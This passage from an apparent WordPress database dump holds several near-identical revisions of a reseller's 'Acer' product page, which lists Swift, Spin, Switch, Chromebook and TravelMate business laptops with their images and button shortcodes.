]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:37:59','2019-09-17 09:37:59','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3117,1,'2019-09-17 17:38:31','2019-09-17 09:38:31','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:38:31','2019-09-17 09:38:31','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3118,1,'2019-09-17 17:38:48','2019-09-17 09:38:48','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:38:48','2019-09-17 09:38:48','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3119,1,'2019-09-17 17:39:23','2019-09-17 09:39:23','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:39:23','2019-09-17 09:39:23','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3120,1,'2019-09-17 17:40:17','2019-09-17 09:40:17','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" 